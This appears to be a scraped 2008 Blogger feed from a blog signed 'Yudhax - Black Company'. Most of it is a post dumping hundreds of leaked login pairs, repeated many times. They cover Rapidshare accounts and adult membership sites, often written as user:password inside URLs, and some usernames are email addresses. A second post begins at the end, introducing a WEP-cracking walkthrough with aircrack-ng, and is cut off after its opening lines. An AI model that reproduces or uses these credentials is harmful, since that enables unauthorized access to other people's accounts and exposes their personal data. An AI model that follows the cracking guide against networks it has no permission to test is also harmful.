class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-7777093453439790878?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-34531893560996906592008-04-15T19:53:00.003+07:002008-05-13T05:11:06.794+07:00<pre>#-------------------------------------------------------<br /> B O N U S / F R E E = 4 my Friend<br />#-------------------------------------------------------<br /><br />intitle:rapidshare intext:login<br /><br />LOGIN: 36274 PASSWORD: 2961920<br /><br />LOGIN: 23290<br />PASSWORD: 8765578<br /><br /><br />Quote:<br />LOGIN: 30439<br />PASSWORD: 1117289<br /><br />Rapidshare login accounts<br /><br /><br />Quote:<br />LOGIN: 45575<br />PASSWORD: 2573305<br /><br /><br />Quote:<br />LOGIN: 46042<br />PASSWORD: 8271283<br /><br /><br />Quote:<br />LOGIN: 46044<br />PASSWORD: 3494441<br /><br /><br />Quote:<br />LOGIN: 46051<br />PASSWORD: 3345449<br /><br /><br />Quote:<br />LOGIN: 46055<br />PASSWORD: 5103287<br /><br /><br />Quote:<br />LOGIN: 50415<br />PASSWORD: 5950137<br /><br />Quote:<br />LOGIN: 50419<br />PASSWORD: 2643224<br /><br />here is more passwords<br /><br />LOGIN: 40586<br />PASSWORD: 4181392<br /><br />Account-ID: 36713<br />Password: 8785993<br /><br />LOGIN: 34746<br />PASSWORD: 7861243<br /><br />LOGIN: 34978<br />PASSWORD: 6943382<br /><br />LOGIN: 34979<br />PASSWORD: 3194204<br /><br />LOGIN: 34980<br />PASSWORD: 7812184<br /><br />Login: 20145<br />Password: 7072148<br /><br />Login: 19159<br />Password: 7932964<br /><br />LOGIN: 20949<br />PASSWORD: 2716739<br /><br />LOGIN: 15156<br />Password: 2679943<br /><br />LOGIN: 18549<br />Password: 4646182<br /><br />LOGIN: 19365<br />PASSWORD: 9667651<br /><br />LOGIN: 18800<br />PASSWORD: 9496722<br /><br />LOGIN: 20949<br />PASSWORD: 2716739<br /><br />LOGIN: 36272<br />PASSWORD: 8961973<br /><br />LOGIN: 36273<br />PASSWORD: 8061013<br /><br />LOGIN: 36274<br />PASSWORD: 2961920<br /><br />LOGIN: 36275<br />PASSWORD: 8018801<br /><br />LOGIN: 36276<br />PASSWORD: 527330<br /><br />LOGIN: 34976<br />PASSWORD: 6650188<br /><br />Account-ID: 36712<br />Password: 1877564<br /><br />LOGIN: 34746<br />PASSWORD: 7861243<br /><br />LOGIN: 34978<br />PASSWORD: 6943382<br /><br />LOGIN: 34979<br />PASSWORD: 3194204<br /><br />LOGIN: 34980<br />PASSWORD: 7812184<br /><br />Login: 20145<br />Password: 7072148<br /><br />Login: 19159<br />Password: 7932964<br /><br />LOGIN: 20949<br />PASSWORD: 2716739<br /><br />LOGIN: 15156<br />Password: 2679943<br /><br />LOGIN: 18549<br />Password: 4646182<br /><br />LOGIN: 19365<br />PASSWORD: 9667651<br /><br />LOGIN: 18800<br />PASSWORD: 9496722<br /><br />LOGIN: 20949<br />PASSWORD: 2716739<br /><br />LOGIN: 36272<br />PASSWORD: 8961973<br /><br />LOGIN: 36273<br />PASSWORD: 8061013<br /><br />LOGIN: 36274<br />PASSWORD: 2961920<br /><br />LOGIN: 36275<br />PASSWORD: 8018801<br /><br />LOGIN: 36276<br />PASSWORD: 527330<br /><br />LOGIN: 34976<br />PASSWORD: 6650188<br /><br />LOGIN: 34978<br />PASSWORD: 6943382<br /><br />LOGIN: 34979<br />PASSWORD: 3194204<br /><br />LOGIN: 34980<br />PASSWORD: 7812184<br /><br /><br />Account-ID: 36713<br />Password: 8785993<br /><br /><br />LOGIN: 36272<br />PASSWORD: 8961973<br /><br /><br />LOGIN: 36274<br />PASSWORD: 2961920<br /><br />LOGIN: 36275<br />PASSWORD: 8018801<br /><br />LOGIN: 36276<br />PASSWORD: 527330<br /><br />LOGIN: 34976<br />PASSWORD: 6650188<br /><br />LOGIN: 34978<br />PASSWORD: 6943382<br /><br /><br /><br />Account-ID: 22834<br />Password: 9814819<br /><br /><br />Account-ID: 47191 Password: 4690422<br />Account-ID: 47189 Password: 2878020<br />Account-ID: 48004 Password: 6866946<br />Account-ID: 48006 Password: 4844644<br />Account-ID: 48008 Password: 2515888<br />Account-ID: 36716 Password: 7634111<br />Account-ID: 45100 Password: 4430955<br />Account-ID: 47191 Password: 4690422<br />Account-ID: 47189 Password: 2878020<br />Account-ID: 48004 Password: 6866946<br />Account-ID: 48006 Password: 4844644<br />Account-ID: 48008 Password: 2515888<br /><br /><br />Quote:<br />LOGIN: 23290<br />PASSWORD: 8765578<br /><br /><br />Quote:<br />LOGIN: 30439<br />PASSWORD: 1117289<br /><br />Rapidshare login accounts<br /><br /><br />Quote:<br />LOGIN: 45575<br />PASSWORD: 2573305<br /><br /><br />Quote:<br />LOGIN: 46042<br />PASSWORD: 8271283<br /><br /><br />Quote:<br />LOGIN: 46044<br />PASSWORD: 3494441<br /><br /><br />Quote:<br />LOGIN: 46051<br />PASSWORD: 3345449<br /><br /><br />Quote:<br />LOGIN: 46055<br />PASSWORD: 5103287<br /><br /><br />Quote:<br />LOGIN: 50415<br />PASSWORD: 5950137<br /><br /><br />Quote:<br />LOGIN: 50419<br />PASSWORD: 2643224<br /><br /><br />here is more passwords<br /><br /><br />LOGIN: 40586<br />PASSWORD: 4181392<br /><br />Account-ID: 36713<br />Password: 8785993<br /><br />LOGIN: 34746<br />PASSWORD: 7861243<br /><br />LOGIN: 34978<br />PASSWORD: 6943382<br /><br />LOGIN: 34979<br />PASSWORD: 3194204<br /><br />LOGIN: 34980<br />PASSWORD: 7812184<br /><br />Login: 20145<br />Password: 7072148<br /><br />Login: 19159<br />Password: 7932964<br /><br />LOGIN: 20949<br />PASSWORD: 2716739<br /><br />LOGIN: 15156<br />Password: 2679943<br /><br />LOGIN: 18549<br />Password: 4646182<br /><br />LOGIN: 19365<br />PASSWORD: 9667651<br /><br />LOGIN: 18800<br />PASSWORD: 9496722<br /><br />LOGIN: 20949<br />PASSWORD: 2716739<br /><br />LOGIN: 36272<br />PASSWORD: 8961973<br /><br />LOGIN: 36273<br />PASSWORD: 8061013<br /><br />LOGIN: 36274<br />PASSWORD: 2961920<br /><br />LOGIN: 36275<br />PASSWORD: 8018801<br /><br />LOGIN: 36276<br />PASSWORD: 527330<br /><br />LOGIN: 34976<br />PASSWORD: 6650188<br /><br />Account-ID: 36712<br />Password: 1877564<br /><br />LOGIN: 34746<br />PASSWORD: 7861243<br /><br />LOGIN: 34978<br />PASSWORD: 6943382<br /><br />LOGIN: 34979<br />PASSWORD: 3194204<br /><br />LOGIN: 34980<br />PASSWORD: 7812184<br /><br />Login: 20145<br />Password: 7072148<br /><br />Login: 19159<br />Password: 7932964<br /><br />LOGIN: 20949<br />PASSWORD: 2716739<br /><br />LOGIN: 15156<br />Password: 2679943<br /><br />LOGIN: 18549<br />Password: 4646182<br /><br />LOGIN: 19365<br />PASSWORD: 9667651<br /><br />LOGIN: 18800<br />PASSWORD: 9496722<br /><br />LOGIN: 20949<br />PASSWORD: 2716739<br /><br />LOGIN: 36272<br />PASSWORD: 8961973<br /><br />LOGIN: 36273<br />PASSWORD: 8061013<br /><br />LOGIN: 36274<br />PASSWORD: 2961920<br /><br />LOGIN: 36275<br />PASSWORD: 8018801<br /><br />LOGIN: 36276<br />PASSWORD: 527330<br /><br />LOGIN: 34976<br />PASSWORD: 6650188<br /><br />LOGIN: 34978<br />PASSWORD: 6943382<br /><br />LOGIN: 34979<br />PASSWORD: 3194204<br /><br />LOGIN: 34980<br />PASSWORD: 7812184<br /><br /><br />Account-ID: 36713<br />Password: 8785993<br /><br /><br />LOGIN: 36272<br />PASSWORD: 8961973<br /><br /><br />LOGIN: 36274<br />PASSWORD: 2961920<br /><br />LOGIN: 36275<br />PASSWORD: 8018801<br /><br />LOGIN: 36276<br />PASSWORD: 527330<br /><br />LOGIN: 34976<br />PASSWORD: 6650188<br /><br />LOGIN: 34978<br />PASSWORD: 6943382<br /><br /><br />---------------<br /><br /><br />Account Members XXX<br />http://www.screamandcream.com/members/ Username: viacehaibiopa99 Password: soucliobacrea50<br />http://members.zenra.com (http://members.zenra.com/) Username : 9Vn7fX Password : 3uAmNt97<br />http://members.maturevslads.com (http://members.maturevslads.com/) Username : 7VZ6TL Password : YJUjRr<br />http://members.sexy-babes.tv (http://members.sexy-babes.tv/) Username: rjpe5wm2MS Password : VNYEw3TCEb<br />http://members.milfhunter.com (http://members.milfhunter.com/) USERNAME : kodiwq81 PASSWORD : demaqq26<br />Links to websites that are included in your membership :<br />http://members.mikeinbrazil.com/<br />http://members.eurosexparties.com/<br />http://members.streetblowjobs.com/<br />http://members.8thstreetlatinas.com/<br />http://members.roundandbrown.com/<br />http://members.milfnextdoor.com/<br />http://members.topshelfpussy.com/<br />http://members.bignaturals.com/<br />http://members.mrchewsasianbeaver.com (http://members.mrchewsasianbeaver.com/) Username: lorena_cordova@mac.com Password : fuck1234<br />http://member02.tokyo-hot.com/member/index.html Username : asapzone Password : fuck1234<br />http://www.actionjav.com/members/index.cfm usercode is : 46907780 passcode is : 9167553<br />http://members.asianxtv.deluxepass.com/ user : dpr63js8 pass : thoucle7<br />Zahra Amir Ebrahimi, http://www.womendiary.net/2006/11/13/zahra-amir-ebrahimi-and-her-sex-video-iranian-paris-hilton-wannabe/Account Members<br />http://www.screamandcream.com/members/ Username: viacehaibiopa99 Password: soucliobacrea50<br />http://members.zenra.com (http://members.zenra.com/) Username : 9Vn7fX Password : 3uAmNt97<br />http://members.maturevslads.com (http://members.maturevslads.com/) Username : 7VZ6TL Password : YJUjRr<br />http://members.sexy-babes.tv (http://members.sexy-babes.tv/) Username: rjpe5wm2MS Password : VNYEw3TCEb<br />http://members.milfhunter.com (http://members.milfhunter.com/) USERNAME : kodiwq81 PASSWORD : demaqq26<br />Links to websites that are included in your membership :<br />http://members.mikeinbrazil.com/<br />http://members.eurosexparties.com/<br />http://members.streetblowjobs.com/<br />http://members.8thstreetlatinas.com/<br />http://members.roundandbrown.com/<br />http://members.milfnextdoor.com/<br />http://members.topshelfpussy.com/<br />http://members.bignaturals.com/<br />http://members.mrchewsasianbeaver.com (http://members.mrchewsasianbeaver.com/) Username: lorena_cordova@mac.com Password : fuck1234<br />http://member02.tokyo-hot.com/member/index.html Username : asapzone Password : fuck1234<br />http://www.actionjav.com/members/index.cfm usercode is : 46907780 passcode is : 9167553<br />http://members.asianxtv.deluxepass.com/ user : dpr63js8 pass : thoucle7<br />http://www.screamandcream.com/members/ Username: viacehaibiopa99 Password: soucliobacrea50<br />http://members.zenra.com (http://members.zenra.com/) Username : 9Vn7fX Password : 3uAmNt97<br />http://members.maturevslads.com (http://members.maturevslads.com/) Username : 7VZ6TL Password : YJUjRr<br />http://members.sexy-babes.tv (http://members.sexy-babes.tv/) Username: rjpe5wm2MS Password : VNYEw3TCEb<br />http://members.milfhunter.com (http://members.milfhunter.com/) USERNAME : kodiwq81PASSWORD : demaqq26<br />http://members.mikeinbrazil.com/<br />http://members.eurosexparties.com/<br />http://members.streetblowjobs.com/<br />http://members.8thstreetlatinas.com/<br />http://members.roundandbrown.com/<br />http://members.milfnextdoor.com/<br />http://members.topshelfpussy.com/<br />http://members.bignaturals.com/<br />http://members.mrchewsasianbeaver.com (http://members.mrchewsasianbeaver.com/) Username: lorena_cordova@mac.com Password : fuck1234<br />http://member02.tokyo-hot.com/member/index.html Username : asapzone Password : fuck1234<br />http://www.actionjav.com/members/index.cfm usercode is : 46907780 passcode is : 9167553<br />http://members.asianxtv.deluxepass.com/ user : dpr63js8 pass : thoucle7<br />http://members.deluxepass.com (http://members.deluxepass.com/) Login: dpf2tj31 Password: xcf62bj<br />http://members.playtimevideo.com/secure/ Login: xdeath87 Password:slayer<br />http://members.interracialtv.com (http://members.interracialtv.com/) Login: SunShyne Password: Stimpy<br />http://jenniferwalcott.com/members/ Login: clticic Password:Tr2Amp25<br />http://allnaughtyhoes.com/members/ Login: sweet Password: sluts<br />http://gagvault.com/members/ Login: pmdmsctsk Password: pmdmsctsk<br />http://big-is-beautiful.net/members/ Login: eskimo Password: fuzzball<br />http://nastyxrated.com/members/ Login: gobierno Password: 74723006<br />http://www.pregnantlady.com/members/ Login: XxXmeanS Password: DaBest<br />http://members.whitepussyblackcocks.com/ Login: harry Password:666666<br />http://members.stephanieswift.com/swiftpass/ Login: test Password: password<br />http://www.sexylesbianvideos.com/members/index.html Login: johalhs Password: sohail<br />http://www.lesbiansorority.com/members/index.html Login: hottest Password: sex<br />http://www.toonfuck.com/private/index.html Login: broken Password: spiral<br />http://www.upskirtass.com/members Login: dowjones Password: stockman199<br />http://monstersofcock.bangbros.com/ Login: lanet32 Password: sosodef<br />http://members.taylorbow.com/protect/ Login: toshiaki1 Password: kawada1<br />http://members.guysluckyday.com/ Login: eyedoc2 Password: contacts<br />http://members.cheergirlsgallery.com (http://members.cheergirlsgallery.com/) Login: shadowon Password: shadow22<br />http://mikesapartmentonline.com/members/index.html Login: zonda Password: zonda<br />http://asian4you.com user id : susahbanget pass : akuberhasil<br />http://www.met-art.com username: kusbang password : nanaloli<br />http://shaunasand.com/members/ Login: pool6123 Password: care1839<br />http://pornstarhearts.com/members/ Login: amber Password: michaels<br />http://bigxxxplace.com/members/ Login: herstal Password: 2004to05<br />http://3porndvds.net/members/ Login: ynotretep Password: nibbinet<br />http://orgyheavenz.com/members/ Login: casey Password: ryback<br />http://cute2slut.com/members/ Login: miguel Password: ferrer<br />http://tickleworld.com/members/ Login: caddyboy Password: caddy044<br />http://www.ddgirls.com/members/ Login: jflores7299 Password: HPwramc04<br />http://members.oxpass.com/ Login: 40steve Password: movies<br />http://bangbrosworldwide.oxpassport.com/ Login: guanche Password: 00001742<br />http://members.bangbros.com Login: ecko215 Password: metho1<br />http://assparade.bangbros.com/ Login: jonno Password: novanova<br />http://members.videosz.com/ Login: vzk88zmt Password: tox6546<br />http://members.naughtyamericavip.com/members/ Login: 08sk05 Password: delta366<br />http://www.members.movieerotica.com Login: 00794014 Password: 9517883<br />http://assparade.bangbros.com/ Login: yardie Password: 123456<br />http://www.sexychristina.com/members/ Login: bintang Password: butterfl<br />http://www.amateursinside.com/members Login: jacob6 Password: archie3<br />http://www.priceless420.com/members/NewPics.htm Login: jamerson Password: kavasia<br />http://www.supermodeltits.com/secure/ Login: telly5 Password: 5telly<br />http://www.mpgpage.com/members/ Login: 63637 Password: 703751<br />http://bunnyglamazon.com/members/ Login: 75nova Password: 688nyq<br />http://nailedchicks.com/members/ Login: gloeffect Password: emuleadmin<br />http://irongoddessnicole.com/members/ Login: 123 Password: 123<br />http://pornstarhearts.com/members/ Login: amber Password: michaels<br />http://nastyxrated.com/members/ Login: gobierno Password: 74723006<br />http://spycamaddicts.com/members/ Login: verbatim Password: stille<br />http://exposedmilfs.net/members/ Login: michelle Password: mansion2<br />http://members.anabolicxxx.com/index.htm Login: rmanus Password: al2fred<br />http://fitdolls.com/members/mem_index.html?CLICK Login: mbhall77 Password: meggie<br />http://members.socalcoeds.com/members/ Login: mackman Password: yaya<br />http://clubnaughtyamerica.com/members/index.html Login: rjoes1 Password: rjoes2<br />http://mikesapartmentonline.com/members/index.html Login: oooooo Password: gerardo<br />http://members.wildlatinagirls.com Login: bigdsrigga Password: nickle<br />http://www.milena-velba.com/mem45xs3/ohayo.html Login: pietje01 Password: henkie01<br />http://dayana-cadeau.com/members/members_fr.html Login: Kiper Password: argo2233<br />http://girlcreations.com/members/ Login: Resys Password: exklusiv<br />http://216658:ypx089@members.homemademovies.deluxepass.co m/<br />http://215731:qfv854@members.homemademovies.deluxepass.co m/<br />http://discreet:sex@coedflashers.com/members/<br />http://wc18c2:l2g7k3@coedflashers.com/members/index.html<br />http://euro:money@coedflashers.com/members/<br />http://sendme:email@coedflashers.com/members/index.html<br />http://hacker:bandit@coedflashers.com/members/index.html<br />http://forxxxhq:birthday1@coedflashers.com/members/<br />http://raleigh:greenville@coedflashers.com/members/index.html<br />http://forxxxhq:birthday131@coedflashers.com/members/<br />http://marcellas:77886@coedflashers.com/members/index.html<br />http://ipilreif:caphcopa@members.bangbrosnetwork.com/<br />http://here89za:yellow@www.babylonxxx.com/members/<br />http://snake413:drill12@members.asiancream.com<br />http://Diver:Diver@members.asiancream.com<br />http://qwerty:ytrewq@www.asianvoltage.com/members/<br />http://luasnts3:inern@members.asiancream.com/<br />http://carroll:caradaptor@members.asiancream.com<br />http://vzr33ecp:cnf22pj@members.videosz.com/<br />http://B34TLES:isvip@members.adultvideonetwork.com<br />http://johnny1:isvipebaby@members.analcravings.com/<br />http://power10:viper9@members.bukkakehouse.com/main.html<br />http://dickie:blue@www.pornoplayhouse.com/live-vip/<br />http://Mcpherso:monkey@wt50.com/in.php?id=xNEJCx<br />http://7450749:supporte@wt50.com/in.php?id=xNEJCx<br />http://vixxen1:audio@wt50.com/in.php?id=xNEJCx<br />http://pacman:internet@wt50.com/in.php?id=xNEJCx<br />http://tang2370:28infern@www.illanalesa.com/members/mo-home.htm?CLICK=<br />http://bluefive:b68nxy@www.illanalesa.com//members/mo-home.htm<br />http://lexluthero:candyman@www.illanalesa.com/members/mo-home.htm<br />http://jdubi31:hoopstar@www.illanalesa.com//members/mo-home.htm<br />http://april16:polycom@www.illanalesa.com/members/mo-home.htm<br />http://Greer:holland@harmonyconcepts.com/www/front.htm<br />http://james.hollands%40ukonline.co.uk:kd5396b@hotlatinag irls.com/members/index.html<br />http://mkoedder:gt2000@members.oxpassport.com<br />http://xsquad98:atl1980@members.oxpass.com/<br />http://beezer:031054@members.oxpass.com<br />http://jacko74:oscar03@bangbus.oxpassport.com<br />http://17nelson:terminal@members.oxpass.com/<br />http://gab25:wowsers@members.oxpass.com/<br />http://tjh241:1313remy@members.oxpass.com/<br />http://tq1000:tqbgmo@members.oxpass.com<br />http://da:da@members.pbits.com<br />http://9jfnaaf8:4p9f8nja@members.pbits.com<br />http://drakon96:002159@www.interactive-cartoons.com/members/welcome.htm<br />http://lam6239:connor@www.interactive-cartoons.com/members/welcome.htm<br />http://zr1toys:202556@members.truecelebs.com/restricted/<br />http://58622442:steve010@members.analboytoys.com/<br />http://dmibear:dmitry@members.oxpass.com/<br />http://byers1:joanchen@members.oxpass.com/<br />http://tshimamoto2001:664349@members.oxpass.com/<br />http://vjsjes:105210@members.oxpass.com/<br />http://cerebus:pope@members.truecelebs.com/restricted/<br />http://love:buster@abc-gallery.com/members/<br />http://sarsakar:babylon5@sheerfinesse.com/members/<br />http://jester65:babylon@www.truexxxposure.com/members/directory.htm<br />http://babylon02:naptime@wasteland.com/paul2851/<br />http://dakman:secret1@babylonxxx.com/members/<br />http://DavidJ:David@www.babylonxxx.com/members/<br />http://davidt85:rachel@www.babylonxxx.com/members/<br />http://vzr33ecp:cnf22pj@members.videosz.com/<br />http://Daniel1:school@www.ageticket.com/members/index.cgi?1000024<br />http://candyian:iancandy@members.bukkakeschool.com<br />http://woodside:school10@www.amyroped.com/memberreal/members.htm<br />http://stalker6:maddog@members.bukkakeschool.com<br />http://javajava:badboy@www.hornyhoundogs.com/hhd_members/<br />http://javajava:badboy@www.allcandid.com/members/index.html<br />http://cuppajava:oda121@amateurallure.com/members/home.html<br />http://madjava:asshole@www.angiexxx.com/members/<br />http://javajoe8282:wizard82@members.netvideogirls.com/members/vfiles/index.html<br />http://81chevy:bigdaddy@members.milfriders.com/full<br />http://petehaines:nova@members.milfriders.com/full<br />http://selifx:mulder@members.milfriders.com/full<br />http://tommyf1:f0cus1@members.milfriders.com/full<br />http://meteu121:nesabsa@members.milfriders.com/full<br />http://amontgo:avaindia@members.celebtaboo.com/members/<br />http://coach101:indiana@members.celebtaboo.com/members/index.phtml<br />http://motormole:moleman1@10000sweetblossoms.com/patrons/blossoms/pixb05/reya151.jpg<br />http://thegil:773413@supercult.com/members/girls2/ana/meetana/p7180398.jpg<br />http://wheaties903:lindo@www.interactive-cartoons.com/members/welcome.htm<br />http://tornado1:windows1@members.amateuravenue.com/<br />http://stevenfx:windows@amateursexphoto.com/members/index.html<br />http://Window:come@twinpeaks69.com/members/<br />http://stevenfx:windows@www.backdoorgirl.com/members/index.html<br />http://windows:112233@www.atlanticass.com/private/<br />http://windows:112233@www.formerfucks.com/members/index.html<br />http://windows:version@www.wassa.net/members/index.html<br />http://stevenfx:windows@www.asian-girl-erotica.com/members/index.html<br />http://windows:112233@www.homofantasy.com/members/index.html<br />http://stevenfx:windows@lesbiangirl.com/members/<br />http://windows:112233@www.mpgpage.com/members/<br />http://stevenfx:windows@girlswholovepussy.com/members/<br />http://windows:112233@www.shymodels.com/members/index.html<br />http://stevenfx:windows@www.amateurgynecologist.com/members/index.html<br />http://tornado1:windows1@www.solarotica.com/smembers/enter.htm<br />http://stevenfx:windows@world-premiere.com/members/index.html<br />http://windows:112233@www.upskirtass.com/members/<br />http://fusarpao:selene@nylonhell.com/members/<br />http://crusader:sup_wolf@aamesummers.com/members/<br />http://hayabusa:alicia@www.thickjuicycocks.com/members/index.html<br />http://crusader:sup_wolf@aamesummers.com/members/index.html<br />http://tamaki:14vbqk9p@www.usagigoya.com/member/member.htm<br />http://benton:susan@all-erotica.com/members/index.html<br />http://valentin:hayabusa@daily-desktops.com/members/<br />http://usarmy:private@altniche.com//members/<br />http://hortusdave:garden1@www.asspoundinghunks.com/members/index.html<br />http://talisman200:garden@www.clubstroke.net/members/<br />http://anselm1:garden48@wasteland.com/paul2851/ad3912.htm<br />http://wooden:garden@members.seeasians.com/<br />http://blanco:gacho@www.seeasians.com/members/index.html<br />http://ryan22:muster@members.seeasians.com/<br />http://g1mpnuts:69696969@www.seeasians.com/members/index.html<br />http://ryan22:muster@members.seeasians.com/<br />http://rich0215:seeasian@www.seeasians.com/members/index.html<br />http://ICEMAN:01452@members.seeasians.com/<br />http://TedYiu:password@members.seeasians.com/<br />http://ryan22:muster@members.seeasians.com/<br />http://fredfred:derfderf@sextoon.com/sextoonvip/welcome.html<br />http://johnny1:isvipebaby@members.ebonygirlsonline.com/<br />http://blades:pedros@www.sextoon.com/sextoonvip/welcome.html<br />http://hunter-divx:hunter-d@eroticsmoking.com/members/<br />http://bagworm:firefox@absolutefacials.com/members/<br />http://oxipy:30325@adraianaventis.com/members/<br />http://allison:allison@4bareness.com/members/index.html<br />http://morph9:fungus@216.130.213.58/members/index.phtml<br />http://oldtar:azsailor@ajay4fun.com/gallery/<br />http://johnking:theduke@ajay4fun.com/members/<br />http://funkyfunky:yeah11@altniche.com/members/<br />http://siadewalk:surfer@members.18teenlive.com/full/<br />http://dental:cosme8@members.18teenlive.com/full/<br />http://thomas:bird@members.18teenlive.com/full/<br />http://barfolot:bman729@members.18teenlive.com/full/<br />http://OEH213MK:NSO726VL@members.18teenlive.com/full/<br />http://Jumte:mayofl@members.18teenlive.com/full/<br />http://allsmp7:memento@www.babylonxxx.com/members/<br />http://babylon02:naptime@wasteland.com/paul2851/<br />http://allyours:sexy@www.babylonxxx.com/members/<br />http://babylon02:naptime@wasteland.com/paul2851/ad3912.htm<br />http://alzzy40:snickers@www.babylonxxx.com/members/<br />http://arch:2002@www.babylonxxx.com/members/<br />http://ddj5:love@www.babylonxxx.com/members/<br />http://aug12:colon@www.babylonxxx.com/members/<br />http://dentman:dentist@www.babylonxxx.com/members/<br />http://b3895a:f3gh65@www.babylonxxx.com/members/<br />http://dmc4u2:horney@www.babylonxxx.com/members/<br />http://b3895w:f3gh65@www.babylonxxx.com/members/<br />http://dmc4u2:horney@www.babylonxxx.com/members/<br />http://b3895wd:f3gh65@www.babylonxxx.com/members/<br />http://enjoy:it@www.babylonxxx.com/members/<br />http://b3895wd4:f3gh65@www.babylonxxx.com/members/<br />http://fdhfdh44a:sadsad32@www.babylonxxx.com/members/<br />http://b389a65:f3gh65@www.babylonxxx.com/members/<br />http://ForCK:FromV@www.babylonxxx.com/members/<br />http://bes555:icetea@www.babylonxxx.com/members/<br />http://gman:1234@www.babylonxxx.com/members/<br />http://bezo:Gooo@www.babylonxxx.com/members/<br />http://godrock:135791@www.babylonxxx.com/members/<br />http://3000:crewcom@www.blondenurses.com/members/<br />http://andy852:luvbekki@blondenurses.com/members/<br />http://33100:00133@www.blondenurses.com/members/<br />http://asdf:asdf@blondenurses.com/members/<br />http://3722:6591@www.blondenurses.com/members/<br />http://4304299:428054@blondenurses.com/members/<br />http://445566:665544@www.blondenurses.com/members/<br />http://33100:00133@blondenurses.com/members/<br />http://447755:557744@www.blondenurses.com/members/<br />http://alan:adams@blondenurses.com/members/index.html<br />http://solpot:homo@playboy.com/members/index.html<br />http://forxxxhq:birthday2@coedflashers.com/members/<br />http://itsalright:ifyawantme@www.coedflashers.com/members/<br />http://forxxxhq:birthday99@coedflashers.com/members/<br />http://igotda:vette@www.coedflashers.com/members/<br />http://rsalinas:nemrac58@coedflashers.com/members/index.html<br />http://girl78:78girl@coedflashers.com/members/<br />http://innocent:desires@coedflashers.com/members/<br />http://dvc60:741852@www.coedflashers.com/members/<br />http://033314:320033@www.coedflashers.com/members/<br />http://jason:jason@coedflashers.com/members/<br />http://1234:1234@coedflashers.com/members/index.html<br />http://jessica3:425mb@coedflashers.com/members/<br />http://123456:654321@coedflashers.com/members/<br />http://john:john@coedflashers.com/members/<br />http://hotystud:facelift@www.blackpornpics.com/members/index.html<br />http://madarab:shift123@blackpornpics.com/members/index.html<br />http://charlesw0:casamm69@www.blackpornpics.com/members/<br />http://peabody:103190@blackpornpics.com/members/index.html<br />http://galpo9:chocha10@www.blackpornpics.com/members/<br />http://erick:aguilar@www.blackpornpics.com/members/<br />http://JAYGOMEZ:WINTONBOY@www.blackpornpics.com/members/<br />http://ginyusan:desire@www.blackpornpics.com/members/<br />http://rickyv:cowzone@www.blackpornpics.com/members/<br />http://hotdoz:llokkj@www.blackpornpics.com/members/<br />http://dkimmerly1:1wrestle@members.clubjenna.com/<br />http://jokeller:july0476@members.clubjenna.com/<br />http://bigwilly:baseball@members.clubjenna.com/<br />http://xtreme469:aerosmit@members.clubjenna.com/<br />http://wespullman:swordfis@members.clubjenna.com/<br />http://alkandarib1:metalgear1@prv.sexyasses.adultbouncer. com/<br />http://oblabroad:6RVYya4N@prv.sexyasses.adultbouncer.com/<br />http://hornybob69:YF22UyY8@prv.sexyasses.adultbouncer.com<br />http://hornybob69:YF22UyY8@prv.sexyasses.adultbouncer.com/<br />http://ztv36saz:hta4227@members.ztod.com<br />http://ztw68rxa:hpu24ea@members.ztod.com<br />http://ztp62z4z:htf788c@members.ztod.com<br />http://ztp57ias:wxir4f3@members.ztod.com<br />http://zty63sso:twomefb@members.ztod.com<br />http://ztk42iet:svr8p8a@members.ztod.com<br />http://ztd47mvm:qptemb7@members.ztod.com<br />http://ztf25p3v:ffq1rj9@members.ztod.com<br />http://ztd27pe3:jouwaed2@members.ztod.com<br />http://ztz55ke5:triodas3@members.ztod.com<br />http://ztw655dr:sleadew7@members.ztod.com<br />http://ztq728q4:cpjmf6a@members.ztod.com<br />http://zte64x28:hmd196j@members.ztod.com<br />http://ztp42mqx:nxy59ff@members.ztod.com<br />http://ztr66mtm:jzjmc4a@members.ztod.com<br />http://janhurak:123456@members.clubjenna.com/<br />http://gawker:clevelan@members.clubjenna.com/<br />http://wetinaminute:michelle@members.clubjenna.com/<br />http://baerwald:roland@members.clubjenna.com/<br />http://central:rusty1@members.clubjenna.com/<br />http://kenobi24:padawan@members.clubjenna.com<br />http://gawker:clevelan@members.clubjenna.com/<br />For GAY sometime u must change u Channel TV to Lesbian Site<br />http://jimmys:hangout@www.lesbiansorority.com/members/<br />http://mtcon:mtcon@lesbiansorority.com/members/<br />http://girl78:78girl@www.lesbiansorority.com/members/<br />http://ellen:john77@lesbiansorority.com/members/index.html<br />http://link:dv123@lesbiansorority.com/members/index.html<br />http://eminiem:dirtybas@lesbiansorority.com/members/index.html<br />http://forxxxhq:birthday299@www.lesbiansorority.com/members/<br />http://eminiem:dirtybastard@lesbiansorority.com/members/index.html<br />http://password:password2003@lesbiansorority.com/members/index.html<br />http://eminiem:dirtybastard99@lesbiansorority.com/members/index.html<br />http://dowjones:stockman46@lesbiansorority.com/members/index.html<br />http://eminiem:dirtybastard99@lesbiansorority.com/members/index.html<br />http://gvd900:gvd900@www.mpgpage.com/members/<br />http://jason:jason@mpgpage.com/members/<br />http://big1:big1@mpgpage.com/members/<br />http://0037:pb351@www.mpgpage.com/members/<br />http://033314:320033@www.mpgpage.com/members/<br />http://asdf:asdf@mpgpage.com/members/<br />Cartoon<br />http://lam6239:connor@www.interactive-cartoons.com/members/welcome.htm<br />http://candyman84:candy@www.interactive-cartoons.com/members/welcome.htm<br />http://polako:hellomot@www.interactive-cartoons.com/members/welcome.htm<br />http://Wnaqwg:BhUpqg@www.interactive-cartoons.com/members/welcome.htm<br />http://geocities.com/kimpetku/index<br /><br />-----------------<br />Dont thinking about me .... be your self bro..<br />-----------------<br /><br />Yudhax - Black Company<br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-3453189356099690659?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com2tag:blogger.com,1999:blog-8559681578113508762.post-17198974606340723632008-04-15T19:51:00.001+07:002008-05-13T05:12:06.018+07:00Here's a quick guide for anyone trying to get injection working on an ipw2200 with BackTrack 2. This is intended for first-time aircrack-ng users, so it will only detail the most basic procedure. You can find more complicated guides with troubleshooting for some of the more complicated access points in other threads.<br /><br />I will be demonstrating a simple WEP crack using ARP request replay. Please also read the newbie guide first so that you generally know what you are doing.<br /><br />** This tutorial is for open authenticted networks only. Shared key authentication is more complicated. **<br /><br />By the way: if you 